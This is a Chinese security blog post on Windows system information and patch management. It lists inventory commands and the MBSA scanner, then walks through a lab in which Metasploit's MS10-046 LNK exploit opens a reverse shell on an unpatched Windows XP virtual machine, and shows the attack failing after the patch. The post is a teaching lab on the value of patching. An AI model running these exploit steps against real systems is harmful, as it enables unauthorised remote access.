Windows安全加固系列-----系统信息与补丁管理

最新推荐文章于 2024-11-12 14:45:45 发布
最新推荐文章于 2024-11-12 14:45:45 发布
阅读量2k 收藏 9
点赞数
分类专栏: Windows安全加固系列 文章标签: Windows安全加固 补丁 ms10-046 kali linux 漏洞攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhaotiannuo_1998/article/details/91429584
版权

2019/6/11 ----

此文章关于介绍Windows系统信息和补丁管理,针对补丁管理有一个小实验,来说明补丁管理的重要性。

系统信息

了解当前系统的信息
(1)版本
Windows NT是一系列操作系统的总称
命令:
1)ver
在这里插入图片描述
2) winver
在这里插入图片描述

  1. systeminfo (显示的更加详细)
    在这里插入图片描述

2、查看sp
service packet (sp) 服务补丁包(一系列补丁的集合)
wmic os get servicepackmajorversion
在这里插入图片描述

3、查看hotfix----热补丁
针对单一漏洞的补丁
wmic qfe get hotfixid,installedon
在这里插入图片描述

4、查看主机名----hostname
在这里插入图片描述

5、查看网络配置-----ipconfig /all
在这里插入图片描述

6、查看路由表-----route print
在这里插入图片描述

7、查看开放端口----netstat -ano

在这里插入图片描述
扩展:

1、netstat -ano | find “:443” 查看开放端口443端口号对应的进程
在这里插入图片描述
2、tasklist -V | find “6988” 查找pid号8112的进程,-v 显示的更详细

在这里插入图片描述
3、taskkill /PID 6988 /T /F 强行终止一个进程
在这里插入图片描述
错误:权限无法访问
解决方法:右击cmd,用管理员身份运行
在这里插入图片描述在这里插入图片描述

补丁管理

关于补丁管理的小实验

实验环境:
用VMware 模拟真实环境
一台kail linux 和windows xp 系统的主机
实验原理:
在kali linux上使用msfconsole利用ms10-046 漏洞对没有系统更新或打补丁的xp主机,进行攻击。
然后在xp主机上打上针对这种漏洞攻击的补丁,再进行攻击

文件快捷方式漏洞MS10-046,利用Windows快捷方式LNK文件的漏洞自动执行代码漏洞攻击。

实验准备:
kali linux 与 Windows xp 能互相ping通,
Windows xp 可以上外网。

在这里插入图片描述
实验工具:
这里准备了针对这个漏洞的补丁,和扫描漏洞的工具 MBSA

Microsoft 基准安全分析器 (MBSA) 可以检查操作系统和 SQL Server 更新,
还可以扫描计算机上的不安全配置。

链接:https://pan.baidu.com/s/1wrx65I_HrTkRv1-1PXjnCw
提取码:rzcp

MBSA工具的使用

双击安装软件,然后点击next
在这里插入图片描述
选择 I accept the license agreement,点击next
在这里插入图片描述
点击next
在这里插入图片描述
点击install
在这里插入图片描述
点击OK,点击桌面的应用程序
在这里插入图片描述
点击scan a computer
在这里插入图片描述
点击start scan
在这里插入图片描述
等待结束
在这里插入图片描述
继续等待
在这里插入图片描述
然后就可以看到有哪些策略不符合安全设置
在这里插入图片描述
实验开始:
一、kali linux 上用msfconsole攻击xp 主机

1、msfconsole		---调用攻击工具
2、search ms10-046		---扫描这个漏洞是否存在
3、use exploit/windows/browser/ms10_046_shortcut_icon_dllloader	---使用这个漏洞	
4、set payload windows/shell/reverse_tcp		---设置反向链接
5、show options			---查看选项
6、set srvhost 192.168.136.10			---设置攻击者的ip地址(kali 的IP地址 )
7、set lhost 192.168.136.10			---设置反向链接的IP地址(kali 的ip地址)
8、show options			---查看选项
9、exploit			---发动攻击

在这里插入图片描述
二、在xp上模拟中招,输入url地址:http://192.168.136.10:80/
在这里插入图片描述在这里插入图片描述

三、查看会话,夺取shell,输入ipconfig,查看ip,攻击成功。。
1、sessions -i
2、sessions -i 1
3、ipconfig

在这里插入图片描述
四、安装补丁
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述
五、再次攻击,发现攻击无效。。补丁的作用体现了出来(⊙_⊙)
在这里插入图片描述在这里插入图片描述
OK,有什么问题,欢迎评论交流 ?

Windows操作系统安全加固策略
02-14
Windows操作系统安全加固策略,使用目前所有Windows服务器系统
个人电脑系统安全加固
weixin_34194087的博客
03-05 544
大家好 !!我是书记,今天我给大家带来的是如何加固个人系统的安全            我们可以从三个方面来考虑,资源管理器,注册表和组策略。我个人认为注册表是电脑的灵魂,职业的说,他是一个电脑的数据库。组策略的重要性,亦也。 That is to say ,我们可以通过对它们的禁用来防止其他人对它的修改和破坏,需要注意的是对它们的禁用的顺序是很重要的,一般的禁用的顺序是资源管理器········...
Windows安全加固总结(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
A1_3_9_7的博客
11-12 567
不知道大家有没有注意到一点,我们平时在使用计算机的时候,如果登陆过一次这台计算机,系统就会默认显示最后一次的登陆名。其实这是一个很不好的点,尤其是当攻击者尝试登陆的时候,他可以一下子就看到你系统的登录名。这时候他只要写一个爆破密码的小脚本,那么他入侵你计算机的可能性就大大增加。
个人电脑安全加固与优化
qq_41060781的博客
11-27 2115
个人电脑的简单安全加固和优化,针对win 10 家庭版
Windows安全加固简介
edwardhyl的专栏
06-20 2829
前言    该文是根据《Hardening Windows NT》翻译而成,其中也根据自己的一些体会及现实情况进行了一些调整。原文可以再参考文献中获得。 目前,Windows系统已经占据了绝大部分的桌面市场,同时在服务器市场也占有较大比重。长期以来,由于病毒攻击、黑客入侵等原因,给人们留下了易受攻击的不好印象。但Windows是否能够变得安全一点成为人们争论的热点,本文将就加固Windows安全进行讨论。   一、病毒防护产品 在很久以前,病毒防护产品真的是很稀有的东西,那时候计算机病毒也真的
Windows服务器】安全基线及安全加固指南V1.0.pdf
02-20
Windows服务器的安全基线及加固指南详细阐述了针对Windows操作系统系统信息收集、补丁管理、账号口令、授权、系统安全设置、网络服务、文件系统、日志审核、IP协议安全配置到防病毒检查等多个方面的安全加固措施和...
Windows操作系统安全加固实施细则.pdf
08-09
针对提供的文件信息,虽然给出的【部分内容】部分因OCR扫描技术原因出现了文字识别错误,但仍可从中提炼出关于Windows操作系统安全加固的关键知识点。 在Windows操作系统中,安全加固是指一系列的操作和配置,旨在...
ISO27001检查表Windows-ChecklistISO27001-信息审计.docx
11-16
WINDOWS 系统安全加固手册是指在 WINDOWS 操作系统上实施的一系列安全设置和配置,以保护系统免受恶意攻击和未经授权的访问。该手册涵盖了操作系统的安全设置、网络安全、身份验证和访问控制、加密、备份和恢复等...
Windows系统安全加固及操作系统安全培训总结
Windows系统安全加固方面,我们需要重点关注以下几个方面:加强系统的账户管理和权限控制、保护系统的重要文件和注册表、及时安装系统补丁和安全更新、安装杀毒软件和防火墙、定期进行系统与数据备份等措施。...
windows10安全基线(1709)
03-16
windows10安全基线(1709),基线安全检查规则及文档。
加固Linux系统----更新和添加安全补丁
weixin_33951761的博客
02-23 414
为了让系统尽可能保持安全,您需要及时了解用于您的软件的新修订和补丁。这些信息可以通过若干个渠道得到,不过,通常软件提供商和 Linux 发行商应该为您及时地提供这些信息。您也可以使用(几乎永远免费)CERT(Computer Emergency Response Team)的服务。他们通常会维持传达关于最新的建议、漏洞信息的邮件列表。 当有新的更新可用时,您...
Windows安全加固手册
weixin_34034261的博客
11-29 927
1 身份鉴别 1.1 密码安全策略 要求:操作系统和数据库系统管理用户身份鉴别信息应具有不易被冒用的特点,口令应有复杂度要求并定期更换。 目的:设置有效的密码策略,防止攻击者破解出密码。 操作步骤: 【位置】开始—管理工具—本地安全策略—帐户策略—密码策略,加固设置为下图所示: 1.2 帐号锁定策略 要求:应启用登录失败处理功...
Windows安全加固
qq_50605865的博客
11-06 4666
Windows安全加固 一、 身份鉴别 密码安全策略 开始—管理工具—本地安全策略—帐户策略—密码策略,加固设置为: 输入命令强制更新策略 账号锁定策略 开始—管理工具—本地安全策略—帐户策略—帐号锁定策略,加固后如下: 安全的远程管理方式 开始—管理工具—远程桌面服务—远程桌面会话主机配置,右键“RDP-Tcp”,选择“属性”—“常规”,加固后如下: 二、 访问控制 关闭默认共享 开始—管理工具—共享和存储管理,右键目标依次停止共享 直到如图所示: 运行—regedit进入注册
Windows安全加固详解
m0_65409532的博客
10-03 1453
打开组策略编辑器,浏览到计算机配置→管理模板→系统,查看各驱动器。• 在 "本地策略 -> 用户权限分配" 中修改。网络服务器”设置为“在挂起会话之前所需的空闲时间”为。• secpol.msc 打开本地安全策略。“从网络访问此计算机”设置为“指定授权用户”把用户添加(把用户从组中删除)到管理员组。给用户改密码(只有管理员可使用)在挂起会话之前所需的空闲时间”本地安全策略”,在“本地策略。本地安全策略”,在“本地策略。本地安全策略”,在“本地策略。防火墙,关闭不需要的端口。“关闭自动播放”状态。
windows安全加固
ting_liang的博客
07-13 837
参考配置操作点击“开始==>运行==>输入gpedit.msc,打开组策略编辑器,在本地计算机策略==>计算机配置==>管理模板==>windows组件==>自动播放策略==>关闭自动播放,勾选已启用,并在对话框中选择所有驱动器,确定即可。点击“开始==>运行==>输入apedit.msc,打开组策略编辑器,在本地计算机策略==>计算机配置==>管理模板==>windows组件==>自动播放策略==>关闭自动播放,勾选已启用,并在对话框中选择所有驱动器即合规,否则不合规。设置密码策略,减少密码安全风险;
Windows安全加固系列
qq_40907977的博客
12-27 624
账号口令-SID详述 账号口令 优化账号 加固方法 图形化界面 开始--运行--计算机管理---本地用户和组,查看有没有不用的账号 命令行模式: net user 用户名 /del ----删除账号 右键-----管理员身份运行---- net user 用户名 /active:no ----锁定账号 回退方法: net user 用户名 /add ----添加账号 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值
>